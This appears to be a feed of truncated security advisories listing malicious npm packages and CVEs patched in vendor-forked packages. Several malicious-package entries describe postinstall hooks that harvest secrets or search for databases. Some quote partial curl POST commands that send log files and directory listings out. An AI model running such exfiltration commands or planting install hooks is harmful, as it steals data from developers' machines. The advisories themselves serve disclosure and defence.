MAL-2026-6522 Malicious code in @epsteinlovekids483/crossmint-wallets-sdk-pentest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6e43e5a418541bb3e485010eba536ecc9f1483dba866af53ff4a760684409213 Package's main entry dist/index.cjs unconditionally requires dist/shai-hulud.js at module load. On require, the code harvests installer secrets —...

ROOT-APP-NPM-CVE-2026-42043 CVE-2026-42043 in @rootio/axios - Patched by Root

Root has patched CVE-2026-42043 in the @rootio/axios package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-42037 CVE-2026-42037 in @rootio/axios - Patched by Root

Root has patched CVE-2026-42037 in the @rootio/axios package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-42039 CVE-2026-42039 in @rootio/axios - Patched by Root

Root has patched CVE-2026-42039 in the @rootio/axios package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44496 CVE-2026-44496 in @rootio/axios - Patched by Root

Root has patched CVE-2026-44496 in the @rootio/axios package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-45740 CVE-2026-45740 in @rootio/protobufjs - Patched by Root

Root has patched CVE-2026-45740 in the @rootio/protobufjs package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44290 CVE-2026-44290 in @rootio/protobufjs - Patched by Root

Root has patched CVE-2026-44290 in the @rootio/protobufjs package for Root:npm. Multiple fixed versions available...

ROOT-APP-NPM-CVE-2026-44289 CVE-2026-44289 in @rootio/protobufjs - Patched by Root

Root has patched CVE-2026-44289 in the @rootio/protobufjs package for Root:npm. Multiple fixed versions available...

MAL-2026-6514 Malicious code in dtxtools (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de085e4b6d38025a5a0b959b19b1022deaa7525b427e66679b58b6892328297a package.json declares a postinstall lifecycle script that auto-executes on npm install. The hook performs a recursive filesystem search for database...

ROOT-APP-NPM-CVE-2026-27903 CVE-2026-27903 in @rootio/minimatch - Patched by Root

Root has patched CVE-2026-27903 in the @rootio/minimatch package for Root:npm. Multiple fixed versions available...

Malicious code in dttfdsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ae565bed85ec0db27f1ff658c7e9491591ce40edc56f423cd8b1122bc209c69c package.json declares a postinstall script that runs automatically on npm install. The script walks the entire filesystem with find to locate databas...

Malicious code in hexo-deployer-wrangler (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ebc95a6a1ae1e522feabf03446f9791372191e27ca9da454717559b6cc6948eb The package ships a binding.gyp file line 6 containing GYP command-expansion syntax !... inside the targets/sources fields. npm implicitly runs...

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

ROOT-APP-NPM-CVE-2026-32236 CVE-2026-32236 in @rootio/backstage__plugin-auth-backend - Patched by Root

Root has patched CVE-2026-32236 in the @rootio/backstageplugin-auth-backend package for Root:npm. Multiple fixed versions available...

Malicious code in easy-string-kit232 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9c3f74b6873c47dc8f3a6d6922e9d66d17cafe47b7a80447f45bfe0d1535a6b5 package.json declares a postinstall lifecycle script that auto-executes on npm install and runs curl -X POST -d "$ls -la /data/logs/"...

Malicious code in dddooo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...

MAL-2026-6460 Malicious code in dddooo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-16.log"...

MAL-2026-6459 Malicious code in easy-string-kit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...

ROOT-APP-NPM-GHSA-VVJJ-XCJG-GR5G GHSA-vvjj-xcjg-gr5g in @rootio/nodemailer - Patched by Root

Root has patched GHSA-vvjj-xcjg-gr5g in the @rootio/nodemailer package for Root:npm. Multiple fixed versions available...

Malicious code in leo-cdk-lib (npm)

The leo-cdk-lib npm package was compromised as part of the Miasma worm campaign targeting the LeoPlatform npm ecosystem. On June 24, 2026, 20 LeoPlatform packages were published within a 3-second window by a threat actor who had taken over the npm account czirker belonging to the LeoPlatform...